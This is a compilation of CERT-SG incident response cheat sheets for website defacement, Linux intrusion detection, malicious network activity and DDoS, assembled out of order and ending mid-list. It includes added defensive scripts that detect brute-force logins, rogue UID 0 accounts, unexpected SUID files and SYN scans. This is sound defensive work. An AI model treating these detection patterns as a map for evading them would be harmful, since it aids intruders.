■ If required (complex issue and very important web server), deploy a temporary web server, up to date with its applications. It should offer the same content as the compromised web server or at least show other legitimate content such as "Temporarily unavailable". The best is to display temporary static content, containing only HTML code. This prevents another infection in case the attacker has used a vulnerability in the legitimate PHP/ASP/CGI/PL/etc. code.


Incident Response Methodology
IRM #6 Website Defacement
Live reaction on a compromised web server
______________________________________________________
IRM Author: CERT SG / Cédric Pernet
IRM version: 1.2
E-Mail: cert.sg@socgen.com
Web: http://cert.societegenerale.com
Twitter: @CertSG

Remediation
Objective: Take actions to remove the threat and avoid future defacements.
Remove all altered content and replace it with the legitimate content, restored from an earlier backup. Make sure this content is free from vulnerabilities.

Recovery
Objective: Restore the system to normal operations.
■ Change all user passwords, if the web server provides user authentication and you have evidence/reasons to think the passwords may have been compromised. This can require a large user communication.
■ If the backup server has been used, restore the primary web server component as the nominal server.

Aftermath
Objective: Document the incident's details, discuss lessons learned, and adjust plans and defences.
Communication
If the defacement has been visible for part of your users, plan to explain the incident publicly.
Report
A crisis report should be written and made available to all of the involved parties. The following themes should be described:
■ Initial detection;
■ Actions and timelines;
■ What went right;
■ What went wrong;
■ Incident cost.
In case of vulnerability discovery, report any undocumented vulnerability lying in a product running on the web server (like a PHP forum) to its editor, so that the code can be upgraded in order to release a fix.

Abstract
This Incident Response Methodology is a cheat sheet dedicated to handlers investigating a precise security issue.
Who should use IRM sheets?
• Administrators
• Security Operation Center
• CISOs and deputies
• CERTs (Computer Emergency Response Team)
Remember: If you face an incident, follow IRM, take notes and do not panic. Contact your CERT immediately if needed.

Incident handling steps
6 steps are defined to handle security incidents
1. Preparation: get ready to handle the incident
2. Identification: detect the incident
3. Containment: limit the impact of the incident
4. Remediation: remove the threat
5. Recovery: recover to a normal stage
6. Aftermath: draw up and improve the process
IRM provides detailed information for each step.
This document is for public use.


Preparation
■ Physical access to the suspicious system should be offered to the forensic investigator.
■ A physical copy of the hard disk might be necessary for forensic and evidence purposes. If needed, physical access could be necessary to disconnect the suspected machine from any network.
■ A good knowledge of the usual network activity of the machine/server is needed. You should have a file in a secure place describing the usual port activity, to compare efficiently to the current state.
■ A good knowledge of the usual services is needed. Don't hesitate to ask a Unix/Linux expert for assistance, when applicable.
■ You should have a regularly updated list of all critical files (especially SUID and SGID files), stored in a secure place out of the network or even on paper. With this list, you can easily separate usual SUID files and detect unusual ones.
■ Have a map of your usual port activity/traffic rules.

Identification
■ Look for unusual files in /proc and /tmp. This last directory is a place of choice for hackers to store data or malicious binaries.

Unusual Services (Linux only)
Run chkconfig (if installed) to check for all enabled services:
# chkconfig --list
Look at the running processes (remember: a rootkit might change your results for everything in this paper, especially here!).
# ps -aux
Use lsof -p [pid] on unknown processes.
You should know your usual running processes, and be able to figure out which processes could have been added by a hacker. Pay special attention to the processes running under UID 0.

Unusual Network Activity
Try to detect sniffers on the network using several ways:
Look at your kernel log files for interfaces entering promiscuous mode, such as: "kernel: device eth0 entered promiscuous mode"
Use # ip link to detect the "PROMISC" flag. Prefer this method to ifconfig, since ifconfig does not work on all kernels.
■ Look for unusual port activity:
# netstat -nap
and
# lsof -i
to get more information about processes listening on ports.
■ Look for unusual MAC entries in your LAN:
# arp -a
■ Look for any unexpected IP address on the network.

Unusual Automated Tasks
■ Look for unusual jobs scheduled by users mentioned in /etc/cron.allow. Pay special attention to the cron jobs scheduled by UID 0 accounts (root):
# crontab -u root -l
■ Look for unusual system-wide cron jobs:
# cat /etc/crontab
and
# ls -la /etc/cron.*

Unusual Log Entries
Look through the log files on the system for suspicious events, including the following:
- Huge number of authentication/login failures from local or remote access tools (sshd, ftpd, etc.)
- Remote Procedure Call (RPC) programs with a log entry that includes a large number of strange characters (…)
- A huge number of Apache logs mentioning "error"
- Reboots (hardware reboot)
- Restart of applications (software reboot)
Almost all log files are located under the /var/log directory in most Linux distributions. Here are the main ones:
/var/log/messages: General messages and system-related stuff
/var/log/auth.log: Authentication logs
/var/log/kern.log: Kernel logs
/var/log/cron.log: Crond logs (cron job)
/var/log/maillog: Mail server logs
/var/log/httpd/: Apache access and error logs directory
/var/log/boot.log: System boot log
/var/log/mysqld.log: MySQL database server log file
/var/log/secure: Authentication log
/var/log/utmp or /var/log/wtmp: Login records file
To look through the log files, tools like cat and grep may be useful:
cat /var/log/httpd/access.log | grep "GET /signup.jsp"
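The first item in the list above (a huge number of login failures) is easy to quantify with awk once the log format is known. The functions below are an added example, not part of the CERT-SG sheet: they count sshd password failures per source address, flag sources at or above a threshold, and also flag the more telling pattern of a successful login from a source that had just been failing, which is what a brute force that finally worked looks like. The log lines are constructed in the classic syslog sshd format found in /var/log/auth.log or /var/log/secure; the threshold is an assumption to tune per host.

```shell
#!/bin/sh
# Added example, not part of the CERT-SG sheet.
# Triage of authentication failures in an sshd log (syslog format).
# The sample lines below are constructed; on a real box feed the file instead:
#   failed_logins_by_source 20 < /var/log/auth.log

SAMPLE_AUTH_LOG='Mar  3 10:12:01 srv sshd[1234]: Failed password for invalid user admin from 203.0.113.7 port 51234 ssh2
Mar  3 10:12:03 srv sshd[1236]: Failed password for root from 203.0.113.7 port 51240 ssh2
Mar  3 10:12:05 srv sshd[1238]: Failed password for root from 203.0.113.7 port 51242 ssh2
Mar  3 10:12:09 srv sshd[1240]: Accepted password for root from 203.0.113.7 port 51250 ssh2
Mar  3 10:13:10 srv sshd[1300]: Accepted publickey for alice from 198.51.100.4 port 40000 ssh2
Mar  3 10:13:12 srv sshd[1301]: Failed password for bob from 198.51.100.4 port 40002 ssh2'

# failed_logins_by_source THRESHOLD  (log on stdin)
# Prints "count ip" for every source with at least THRESHOLD failures, most
# failures first. Both "Failed password for invalid user X from IP" and
# "Failed password for X from IP" put the address right after the word "from".
failed_logins_by_source() {
    awk -v min="${1:-1}" '
        /sshd\[[0-9]+\]: Failed password for / {
            for (i = 1; i <= NF; i++) if ($i == "from") { fails[$(i+1)]++; break }
        }
        END { for (ip in fails) if (fails[ip] >= min) printf "%d %s\n", fails[ip], ip }
    ' | sort -rn
}

# success_after_failures  (log on stdin)
# Prints "ip user failures" when a source logs in successfully after having
# failed at least once before: the signature of a brute force that succeeded.
success_after_failures() {
    awk '
        /sshd\[[0-9]+\]: Failed password for / {
            for (i = 1; i <= NF; i++) if ($i == "from") { fails[$(i+1)]++; break }
        }
        /sshd\[[0-9]+\]: Accepted / {
            for (i = 1; i <= NF; i++) if ($i == "from") { ip = $(i+1); break }
            user = $(i-1)                         # the word just before "from"
            if (fails[ip] > 0) printf "%s %s %d\n", ip, user, fails[ip]
        }
    '
}

echo "Sources with >= 2 failures:"
printf '%s\n' "$SAMPLE_AUTH_LOG" | failed_logins_by_source 2
echo "Successful logins preceded by failures from the same source:"
printf '%s\n' "$SAMPLE_AUTH_LOG" | success_after_failures
```

On the sample, the first report is `3 203.0.113.7` and the second is `203.0.113.7 root 3`: three failed root attempts followed by an accepted password from the same address, which deserves more attention than the raw failure count. Remember the sheet's own caveat about rootkits and add the obvious one for logs: an attacker with root can truncate auth.log, so this is only trustworthy when the logs were also shipped to a remote server.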

Unusual Kernel Log Entries
■ Look through the kernel log files on the system for suspicious events. Use:
# dmesg
List all important kernel and system information:
# lsmod
# lspci
■ Look for known rootkits (use rkhunter and such tools).

File hashes
Verify all MD5 hashes of your binaries in /bin, /sbin, /usr/bin, /usr/sbin or any other related binary storing place (use AIDE or such tool; MD5 is what the sheet names, but a baseline built today should use SHA-256, which AIDE supports).
WARNING: this operation will probably change all file timestamps. This should only be done after all other investigations are done and you feel like you can alter these data.
On systems with RPM installed, use:
# rpm -Va | sort
On some Linux distributions, a script named check-packages can be used.
On Solaris: # pkg_chk -vn
On Debian: debsums -ac
On OpenBSD (not really this but a way): pkg_delete -vnx

Unusual Accounts
Look for any suspicious entry in /etc/passwd, especially with UID 0. Also check /etc/group and /etc/shadow.
Look for orphaned files, which could have been left by a deleted account used in the attack:
# find / \( -nouser -o -nogroup \) -print

Unusual Files
■ Look for all SUID and SGID files:
# find / -uid 0 \( -perm -4000 -o -perm -2000 \) -print
■ Look for weird file names, starting with ". " or ".. " or " ":
# find / -name " *" -print
# find / -name ". *" -print
# find / -name ".. *" -print
■ Look for large files (here: larger than 10MB):
# find / -size +10M -print
■ Look for processes running from or to files which have been unlinked:
# lsof +L1
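Several of the checks above compare the live state with a list prepared beforehand (the SUID list "stored in a secure place", the usual port activity). The functions below are an added example, not from the CERT-SG sheet, and they take their input as text so the same code runs against live command output or against output saved from the suspect machine: a PROMISC filter over `ip -o link`, a UID 0 filter over passwd-format data, and a baseline comparison of SUID/SGID files. The `ip -o link` and passwd lines are constructed; the baseline file is an assumption, and the sheet's rootkit caveat applies to everything here.

```shell
#!/bin/sh
# Added example, not part of the CERT-SG sheet.
# Text-driven versions of three identification checks, usable on live output
# or on output collected earlier from the suspect system.
# Caveat from the sheet: a kernel rootkit can lie to every tool used here.

# promisc_ifaces  (stdin: output of `ip -o link`) -> names of interfaces in
# promiscuous mode, i.e. whose flag list contains PROMISC.
promisc_ifaces() {
    awk -F': ' '$3 ~ /^<[^>]*PROMISC[^>]*>/ { sub(/@.*/, "", $2); print $2 }'
}

# uid0_accounts  (stdin: /etc/passwd format) -> accounts with UID 0 other
# than root. Any hit is a finding: attackers add "toor"-style accounts.
uid0_accounts() {
    awk -F: '$3 == 0 && $1 != "root" { print $1 }'
}

# current_suid_list ROOT -> sorted SUID/SGID regular files under ROOT, staying
# on one filesystem (-xdev), so run it once per mounted filesystem. On a live
# box ROOT is "/" and root privileges are needed to see everything.
current_suid_list() {
    find "${1:-/}" -xdev -type f \( -perm -4000 -o -perm -2000 \) -print 2>/dev/null |
        LC_ALL=C sort
}

# unexpected_suid BASELINE_FILE CURRENT_FILE -> paths present now but absent
# from the baseline (the list the sheet says to keep off the machine).
unexpected_suid() {
    b=$(mktemp); c=$(mktemp)
    LC_ALL=C sort -u "$1" > "$b"
    LC_ALL=C sort -u "$2" > "$c"
    LC_ALL=C comm -13 "$b" "$c"
    rm -f "$b" "$c"
}

# --- constructed samples -----------------------------------------------------
SAMPLE_IPLINK='1: lo: <LOOPBACK,UP,LOWER_UP> mtu 65536 qdisc noqueue state UNKNOWN mode DEFAULT group default qlen 1000\    link/loopback 00:00:00:00:00:00 brd 00:00:00:00:00:00
2: eth0: <BROADCAST,MULTICAST,PROMISC,UP,LOWER_UP> mtu 1500 qdisc fq_codel state UP mode DEFAULT group default qlen 1000\    link/ether 52:54:00:12:34:56 brd ff:ff:ff:ff:ff:ff
3: veth1@if7: <BROADCAST,MULTICAST,UP,LOWER_UP> mtu 1500 qdisc noqueue master br0 state UP mode DEFAULT group default\    link/ether 02:42:ac:11:00:02 brd ff:ff:ff:ff:ff:ff'

SAMPLE_PASSWD='root:x:0:0:root:/root:/bin/bash
daemon:x:1:1:daemon:/usr/sbin:/usr/sbin/nologin
alice:x:1000:1000:Alice:/home/alice:/bin/bash
sysadm:x:0:0::/tmp:/bin/sh'

demo() {
    echo "Interfaces in promiscuous mode:"
    printf '%s\n' "$SAMPLE_IPLINK" | promisc_ifaces
    echo "Extra UID 0 accounts:"
    printf '%s\n' "$SAMPLE_PASSWD" | uid0_accounts
    # SUID baseline vs current state, on a scratch tree so the demo is offline
    t=$(mktemp -d)
    mkdir "$t/bin" "$t/tmp"
    printf '%s\n' "$t/bin/su" "$t/bin/passwd" > "$t/baseline.txt"
    for f in bin/su bin/passwd tmp/.x; do : > "$t/$f"; chmod 4755 "$t/$f"; done
    current_suid_list "$t" > "$t/current.txt"
    echo "SUID files not in baseline:"
    unexpected_suid "$t/baseline.txt" "$t/current.txt"
    rm -rf "$t"
}
demo
```

The demo reports `eth0`, `sysadm` and the planted `tmp/.x` binary. On a real engagement, save `ip -o link`, `/etc/passwd` and `current_suid_list /` from the suspect host with a statically linked toolset, then run the filters on the analysis machine, so that the comparison does not depend on binaries the attacker may have replaced.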


Incident Response Methodology
IRM #3 Unix/Linux Intrusion Detection
Live Analysis on a suspected system
______________________________________________________
IRM Author: CERT SG / Cedric Pernet
IRM version: 1.3
E-Mail: cert.sg@socgen.com
Web: http://cert.societegenerale.com
Twitter: @CertSG

Containment
■ Back up all important data from the compromised machine, if possible using a bit-by-bit physical copy of the whole hard disk on an external support. Also make a copy of the memory (RAM) of the system, which will be investigated if necessary.
If the machine is not considered critical for the company and can be disconnected, shut the machine down the hard way (after the memory copy above has been taken), removing its power plug. If it is a laptop with a battery on, just push the "off" button for some seconds until the computer switches off.
Offline investigations should be started right away if the identification step didn't give any result, but the system is still suspected of being compromised.
Try to find evidence of every action of the hacker (using forensic tools like Sleuth Kit/Autopsy for example):
■ Find all files used by the attacker, including deleted files, and see what has been done with them, or at least their functionality, to evaluate the threat.
■ Check all files accessed recently.
■ Check log files.
■ More generally, try to find how the attacker got into the system. All leads should be considered. If no computer proof of the intrusion is found, never forget it could come from an insider.
■ Apply fixes when applicable, to prevent the same kind of intrusion, in case the attacker used a known fixed vulnerability.

Remediation
Temporarily remove all access to the accounts involved in the incident, and remove all fraudulent files.

Recovery
No matter how far the hacker has gone into the system and the knowledge you might have about the compromise, as long as the system has been penetrated, the best practice is to reinstall the system completely and apply all security fixes.
In case this solution can't be applied, you should:
■ Change all the system's account passwords, and make your users do so in a secure way: they should use passwords with upper/lower case, special characters, numbers, and at least 7 characters long.
■ Check the integrity of the whole data stored on the system, using MD5 hashes.
■ Restore all binaries which could have been changed (example: /bin/su).

Aftermath
Report
A crisis report should be written and made available to all of the actors of the crisis management cell. The following themes should be described:
■ Initial detection
■ Actions and timelines
■ What went right
■ What went wrong
■ Incident cost
Capitalize
Actions to improve the Unix/Linux intrusion detection management processes should be defined to capitalize on this experience.

Abstract
This Incident Response Methodology is a cheat sheet dedicated to incident handlers investigating a precise security issue.
Who should use IRM sheets?
• Administrators
• Security Operation Center
• CISOs and deputies
• CERTs (Computer Emergency Response Team)
Remember: If you face an incident, follow IRM, take notes and do not panic. Contact your CERT immediately if needed.

Incident handling steps
6 steps are defined to handle security incidents
1. Preparation: get ready to handle the incident
2. Identification: detect the incident
3. Containment: limit the impact of the incident
4. Remediation: remove the threat
5. Recovery: recover to a normal stage
6. Aftermath: draw up and improve the process
IRM provides detailed information for each step.
This document is for public use.


Preparation
Objective: Establish contacts, define procedures, gather information and get familiar with intrusion detection tools to save time during an attack.
Intrusion Detection Systems
Ensure that the monitoring tools are up to date;
Establish contacts with your network and security operation teams;
Make sure that an alert notification process is defined and well known to everyone.
Network
Make sure that an inventory of the network access points is available and up to date;
Make sure that network teams have up-to-date network maps and configurations;
Look for potential unwanted network access points (xDSL, Wifi, Modem, …) regularly and close them;
Ensure that traffic management tools and processes are operational.
Baseline traffic
Identify the baseline traffic and flows;
Identify the business-critical flows.

Identification
Objective: Detect the incident, determine its scope, and involve the appropriate parties.
Sources of detection:
Notification by user/helpdesk;
IDS alert;
Detection by network staff;
Complaint from an external source.
Record suspect network activity
Network frames can be stored into a file and transmitted to your incident response team for further analysis. Use network capture tools (tshark, windump, tcpdump…) to dump malicious traffic. Use a hub or port mirroring on an affected LAN to collect valuable data. Network forensics requires skills and knowledge. Ask your incident response team for assistance or advice.
Analyze the attack
Analyze alerts generated by your IDS;
Review statistics and logs of network devices;
Try to understand the goal of the malicious traffic and identify the infrastructure components affected by it;
Identify the technical characteristics of the traffic:
- Source IP address(es)
- Ports used, TTL, Packet ID, …
- Protocols used
- Targeted machines/services
- Exploit(s)
- Remote accounts logged in
At the end of this step, the impacted machines and the modus operandi of the attack should have been identified. Ideally, the source of the attack should have been identified as well. This is where you should do your forensic investigations, if needed. If a compromised computer has been identified, check the IRM cheat sheets dedicated to intrusion.
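To pull the "technical characteristics of the traffic" listed above out of a capture without opening a GUI, the functions below are an added example (not from the CERT-SG sheet). They read `tcpdump -nn` text on stdin, summarise per source how many pure SYNs it sent and to how many distinct hosts and ports (many hosts or ports from one source is a scan), and list which host:port pairs were targeted. The packet lines are constructed in tcpdump's default IPv4/TCP line format; TTL and IP ID only appear with `tcpdump -v` and are not parsed here.

```shell
#!/bin/sh
# Added example, not part of the CERT-SG sheet.
# Summarise tcpdump -nn text output: who sends SYNs to what. Lines look like
#   HH:MM:SS.usec IP SRC.SPORT > DST.DPORT: Flags [S], seq ..., length 0
# Only IPv4 TCP lines are handled (IPv6 uses a different host.port notation).
# Real use:  tcpdump -nn -r capture.pcap tcp | syn_sources

# Constructed capture: one host probing SMB/NetBIOS on two servers, one
# SYN/ACK reply, and a normal HTTPS data packet from another client.
SAMPLE_TCPDUMP='10:01:02.123456 IP 203.0.113.7.44312 > 192.0.2.10.445: Flags [S], seq 1, win 64240, length 0
10:01:02.123789 IP 203.0.113.7.44313 > 192.0.2.10.139: Flags [S], seq 1, win 64240, length 0
10:01:02.124001 IP 203.0.113.7.44314 > 192.0.2.11.445: Flags [S], seq 1, win 64240, length 0
10:01:02.124500 IP 192.0.2.10.445 > 203.0.113.7.44312: Flags [S.], seq 7, ack 2, win 65535, length 0
10:01:03.000000 IP 198.51.100.4.51000 > 192.0.2.10.443: Flags [P.], seq 1:100, ack 1, win 501, length 99'

# Shared awk prologue: split "host.port" into host and port. In a tcpdump line
# $3 = "SRC.SPORT", $5 = "DST.DPORT:" (trailing colon), $7 = "[FLAGS],".
_split_endpoints='
    function split_ep(ep, out,    n, parts) {
        sub(/:$/, "", ep)
        n = split(ep, parts, ".")
        out["port"] = parts[n]
        out["host"] = substr(ep, 1, length(ep) - length(parts[n]) - 1)
    }
'

# syn_sources  (stdin: tcpdump -nn text)
# -> "src syn_count distinct_hosts distinct_ports" for pure SYN packets
#    (Flags [S]; [S.] is the SYN/ACK reply and is not counted), busiest first.
syn_sources() {
    awk "$_split_endpoints"'
        $2 == "IP" && $7 == "[S]," {
            split_ep($3, s); split_ep($5, d)
            syns[s["host"]]++
            hosts[s["host"], d["host"]] = 1
            ports[s["host"], d["port"]] = 1
        }
        END {
            for (src in syns) {
                nh = 0; np = 0
                for (k in hosts) { split(k, a, SUBSEP); if (a[1] == src) nh++ }
                for (k in ports) { split(k, a, SUBSEP); if (a[1] == src) np++ }
                printf "%s %d %d %d\n", src, syns[src], nh, np
            }
        }
    ' | LC_ALL=C sort -k2,2nr
}

# targeted_services  (stdin) -> "dst:port count" for every destination that
# received a SYN, busiest first: the sheet's "targeted machines/services".
targeted_services() {
    awk "$_split_endpoints"'
        $2 == "IP" && $7 == "[S]," {
            split_ep($5, d)
            n[d["host"] ":" d["port"]]++
        }
        END { for (k in n) printf "%s %d\n", k, n[k] }
    ' | LC_ALL=C sort -k2,2nr -k1,1
}

echo "SYN sources (src syns hosts ports):"
printf '%s\n' "$SAMPLE_TCPDUMP" | syn_sources
echo "Targeted services:"
printf '%s\n' "$SAMPLE_TCPDUMP" | targeted_services
```

On the sample the first summary is `203.0.113.7 3 2 2`: one source, three SYNs, two hosts, two ports, while the HTTPS client never appears because it sent no bare SYN. Those two lists are the source address and the targeted machines/services the sheet asks you to record, and the source column is what goes into the firewall or IPS rule in the containment step.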

Containment
Objective: Mitigate the attack's effects on the neighbouring IT resources.
If the issue is considered strategic (sensitive resources access), a specific crisis management cell should be activated. Depending on the criticality of the impacted resources, the following steps can be performed and monitored:
Disconnect the compromised area from the network.
Isolate the source of the attack. Disconnect the affected computer(s) in order to perform further investigation.
Find acceptable mitigation measures for the business-critical traffic in agreement with the business line managers.
Terminate unwanted connections or processes on affected machines.
Use firewall/IPS rules to block the attack.
Use IDS rules to match this malicious behaviour and inform technical staff on new events.
Apply ad hoc actions in case of a strategic issue:
- Block the exfiltration destination or remote location on Internet filters;
- Restrict strategic file servers to reject connections from the compromised computer;
- Select what kind of files can be lost / stolen and restrict the access to confidential files;
- Create fake documents with watermarking that could be used as a proof of theft;
- Notify targeted business users about what must be done and what is forbidden;
- Configure logging capabilities in verbose mode on the targeted environment and store them on a remote secure server.


Incident Response Methodology
IRM #5 Malicious network behaviour
Guidelines to handle a suspicious network activity
______________________________________________________
Author: CERT-SG / David Bizeul & Vincent Ferran-Lacome
IRM version: 1.3
E-Mail: cert.sg@socgen.com
Web: http://cert.societegenerale.com
Twitter: @CertSG

Abstract
This Incident Response Methodology is a cheat sheet dedicated to handlers investigating a precise security issue.
Who should use IRM sheets?
• Administrators
• Security Operation Center
• CISOs and deputies
• CERTs (Computer Emergency Response Team)
IRM can be shared with all SG staff.
Remember: If you face an incident, follow IRM, take notes and do not panic. Contact your CERT immediately if needed.

Incident handling steps
6 steps are defined to handle security incidents
1. Preparation: get ready to handle the incident
2. Identification: detect the incident
3. Containment: limit the impact of the incident
4. Remediation: remove the threat
5. Recovery: recover to a normal stage
6. Aftermath: draw up and improve the process
IRM provides detailed information for each step.
This document is for public use.

Remediation
Objective: Take actions to stop the malicious behaviour.
Block the source
Using the analysis from the previous steps (identification and containment), find out all communication channels used by the attacker and block them on all your network boundaries.
If the source has been identified as an insider, take appropriate actions and involve your management and/or HR team and/or legal team.
If the source has been identified as an external offender, consider involving abuse teams and law enforcement services if required.
Technical remediation
Define a remediation process. If necessary, this process can be validated by another structure, like your incident response team for example. Remediation steps from the intrusion IRMs can also be useful.
Test and enforce
Test the remediation process and make sure that it properly works without damaging any service. Enforce the remediation process once tests have been approved by both IT and business.

Recovery
Objective: Restore the system to normal operations.
1. Ensure that the network traffic is back to normal
2. Re-allow the network traffic that was used as a propagation method by the attacker
3. Reconnect sub-areas together if necessary
4. Reconnect the area to your local network if necessary
5. Reconnect the area to the Internet if necessary
All of these steps shall be made in a step-by-step manner and with technical monitoring.

Aftermath
Objective: Document the incident's details, detail the collected data, and identify the improvements.
Report
A report should be written and made available to all of the actors. The following themes should be described:
- Initial cause of the issue
- Actions and timelines
- What went right
- What went wrong
- Incident cost
Capitalize
Actions to improve the network intrusion management processes should be defined to capitalize on this experience.

93107

Page 112: edu.anarcho-copy.org IP - Network/BTCSwGSEnotes.pdf · i TABLE OF CONTENTS SECTION TITLE PAGE Table of Contents - Networking/Blue Team Tools

IRM #4: DDoS incident response (Preparation, Identification, Containment)

Preparation (step 1)

Objective: Establish contacts, define procedures, and gather information to save time during an attack.

Internet Service Provider support

Contact your ISP to understand the DDoS mitigation services it offers (free and paid) and what process you should follow.

If possible, subscribe to a redundant Internet connection.

Establish contacts with your ISP and law enforcement entities. Make sure that you have the possibility to use an out-of-band communication channel (e.g.: phone).

Inventory

Create a whitelist of the IP addresses and protocols you must allow if prioritizing traffic during an attack. Don't forget to include your critical customers, key partners, etc.

Document your IT infrastructure details, including business owners, IP addresses and circuit IDs, routing settings (AS, etc.); prepare a network topology diagram and an asset inventory.

Network infrastructure

Design a good network infrastructure without Single Point of Failure or bottleneck.

Distribute your DNS servers and other critical services (SMTP, etc.) through different AS.

Harden the configuration of network, OS, and application components that may be targeted by DDoS.

Baseline your current infrastructure's performance, so you can identify the attack faster and more accurately.

If your business is Internet dependent, consider purchasing specialized DDoS mitigation products or services.

Confirm DNS time-to-live (TTL) settings for the systems that might be attacked. Lower the TTLs, if necessary, to facilitate DNS redirection if the original IP addresses get attacked. 600 is a good TTL value.

Depending on the criticality of your services, consider setting up a backup that you can switch on in case of issue.

Internal contacts

Establish contacts for your IDS, firewall, systems, and network teams.

Collaborate with the business lines to understand the business implications (e.g., money loss) of likely DDoS attack scenarios.

Involve your BCP/DR planning team on DDoS incidents.

The "preparation" phase is to be considered as the most important element of a successful DDoS incident response.

Identification (step 2)

Objective: Detect the incident, determine its scope, and involve the appropriate parties.

Analyze the attack

Understand the logical flow of the DDoS attack and identify the infrastructure components affected by it.

Understand if you are the target of the attack or a collateral victim.

Review the load and log files of servers, routers, firewalls, applications, and other affected infrastructure.

Identify what aspects of the DDoS traffic differentiate it from benign traffic:

- Source IP addresses, AS, etc.
- Destination ports
- URLs
- Protocol flags

Network analysis tools can be used to review the traffic: Tcpdump, Tshark, Snort, Argus, Ntop, Aguri, MRTG.

If possible, create a NIDS signature to differentiate between benign and malicious traffic.

Involve internal and external actors

Contact your internal teams to learn about their visibility into the attack.

Contact your ISP to ask for help. Be specific about the traffic you'd like to control:

- Network blocks involved
- Source IP addresses
- Protocols

Notify your company's executive and legal teams.

Check the background

Find out whether the company received an extortion demand as a precursor to the attack.

Search if anyone would have any interest in threatening your company:

- Competitors
- Ideologically-motivated groups (hacktivists)
- Former employees

Containment (step 3)

Objective: Mitigate the attack's effects on the targeted environment.

If the bottleneck is a particular feature of an application, temporarily disable that feature.

Attempt to throttle or block DDoS traffic as close to the network's "cloud" as possible via a router, firewall, load balancer, specialized device, etc.

Terminate unwanted connections or processes on servers and routers and tune their TCP/IP settings.

If possible, switch to alternate sites or networks using DNS or another mechanism. Blackhole DDoS traffic targeting the original IP addresses.

Set up an alternate communication channel between you and your users/customers (e.g.: web server, mail server, voice server, etc.).

If possible, route traffic through a traffic-scrubbing service or product via DNS or routing changes (e.g.: sinkhole routing).

Configure egress filters to block the traffic your systems may send in response to DDoS traffic (e.g.: backscatter traffic), to avoid adding unnecessary packets to the network.

In case of an extortion attempt, try to buy time with the fraudster. For example, explain that you need more time in order to get management approval.

If the bottleneck is at the ISP's side, only the ISP can take efficient actions. In that case, work closely with your ISP and make sure you share information efficiently.
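The Identification step above asks which aspects of the DDoS traffic set it apart from benign traffic (source addresses, destination ports, protocol flags), and the Preparation step asks for a whitelist of addresses you must keep allowing. The Python script below is an added example, not part of the CERT SG sheet: it compares a constructed set of flow records from an attack window against a constructed baseline, reports the attributes whose packet share jumped, and derives a candidate block list that skips whitelisted networks. The flow record format, the sample addresses (RFC 5737 documentation ranges) and the 198.51.100.0/24 "critical customer" whitelist are all assumptions made for this example.

```python
"""
Added example: separate DDoS traffic from the baseline and derive a block
list that honours the whitelist. Flow records and addresses are constructed
for this example (RFC 5737 documentation ranges), not taken from any capture.
"""
from collections import Counter
from dataclasses import dataclass
import ipaddress


@dataclass(frozen=True)
class Flow:
    src: str        # source IP address
    dst_port: int   # destination port
    proto: str      # "tcp" or "udp"
    flags: str      # TCP flags seen, e.g. "S" (SYN only); "" for UDP
    packets: int    # packet count for this flow


def parse_flows(text):
    """Parse the assumed 'src,dst_port,proto,flags,packets' flow format."""
    flows = []
    for line in text.strip().splitlines():
        line = line.strip()
        if not line or line.startswith("#"):
            continue
        src, port, proto, flags, pkts = [f.strip() for f in line.split(",")]
        flows.append(Flow(src, int(port), proto, flags, int(pkts)))
    return flows


# Constructed baseline: a normal day, mostly completed TCP sessions to 443.
BASELINE = parse_flows("""
# src,dst_port,proto,flags,packets
198.51.100.10,443,tcp,SA,120
198.51.100.11,443,tcp,SA,95
203.0.113.5,80,tcp,SA,40
203.0.113.6,25,tcp,SA,12
198.51.100.12,53,udp,,30
""")

# Constructed attack window: a SYN flood against port 80 from a few sources,
# including one inside the whitelisted 198.51.100.0/24 customer network.
ATTACK = parse_flows("""
# src,dst_port,proto,flags,packets
198.51.100.10,443,tcp,SA,110
203.0.113.5,80,tcp,SA,35
192.0.2.1,80,tcp,S,5000
192.0.2.2,80,tcp,S,4800
192.0.2.3,80,tcp,S,5100
192.0.2.4,80,tcp,S,4950
192.0.2.77,80,tcp,S,5200
198.51.100.200,80,tcp,S,4700
""")

ALLOWLIST = ["198.51.100.0/24"]  # assumed: critical customers, never auto-blocked


def packet_share(flows, key):
    """Fraction of all packets per distinct value of key(flow)."""
    total = sum(f.packets for f in flows)
    counts = Counter()
    for f in flows:
        counts[key(f)] += f.packets
    return {value: n / total for value, n in counts.items()}


def differentiators(baseline, attack, min_delta=0.3):
    """Attributes (name, value) whose packet share rose by >= min_delta."""
    keys = {"dst_port": lambda f: f.dst_port,
            "flags": lambda f: f.flags,
            "proto": lambda f: f.proto}
    found = {}
    for name, key in keys.items():
        before = packet_share(baseline, key)
        during = packet_share(attack, key)
        for value, frac in during.items():
            delta = frac - before.get(value, 0.0)
            if delta >= min_delta:
                found[(name, value)] = round(delta, 3)
    return found


def candidate_blocks(attack, allowlist, min_packets):
    """Split high-volume sources into (block, review): whitelisted sources
    are never blocked automatically, they are returned for manual review."""
    nets = [ipaddress.ip_network(n) for n in allowlist]
    per_src = Counter()
    for f in attack:
        per_src[f.src] += f.packets
    block, review = [], []
    for src, pkts in per_src.items():
        if pkts < min_packets:
            continue
        addr = ipaddress.ip_address(src)
        (review if any(addr in n for n in nets) else block).append(src)
    return (sorted(block, key=ipaddress.ip_address),
            sorted(review, key=ipaddress.ip_address))


def tcpdump_filter(sources, dst_port):
    """BPF expression to review the suspect traffic with tcpdump/tshark."""
    hosts = " or ".join(f"src host {s}" for s in sources)
    return f"dst port {dst_port} and ({hosts})"


if __name__ == "__main__":
    print(differentiators(BASELINE, ATTACK))
    block, review = candidate_blocks(ATTACK, ALLOWLIST, min_packets=1000)
    print("block:", block, "review:", review)
    print(tcpdump_filter(block, 80))
```

On the sample data the two differentiators are destination port 80 and the SYN-only flag, which is what the ISP needs to hear when you ask it to filter. Sources in the review list exceeded the threshold but sit inside a whitelisted network, so the decision goes to a person rather than a rule. The returned BPF expression is only a capture filter for examining the suspect traffic with the tools listed above; it does not block anything.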

IRM #4: DDoS incident response (Remediation, Recovery, Aftermath)

Incident Response Methodology IRM #4
DDoS incident response
Guidelines to handle Distributed Denial of Service incidents

IRM Author: CERT SG / Vincent Ferran-Lacome
IRM version: 1.3
E-Mail: cert.sg@socgen.com
Web: http://cert.societegenerale.com
Twitter: @CertSG

Abstract

This Incident Response Methodology is a cheat sheet dedicated to handlers investigating a precise security issue.

Who should use IRM sheets?

- Administrators
- Security Operation Center
- CISOs and deputies
- CERTs (Computer Emergency Response Team)

Remember: If you face an incident, follow IRM, take notes and do not panic. Contact your CERT immediately if needed.

Incident handling steps

6 steps are defined to handle security incidents:

- Preparation: get ready to handle the incident
- Identification: detect the incident
- Containment: limit the impact of the incident
- Remediation: remove the threat
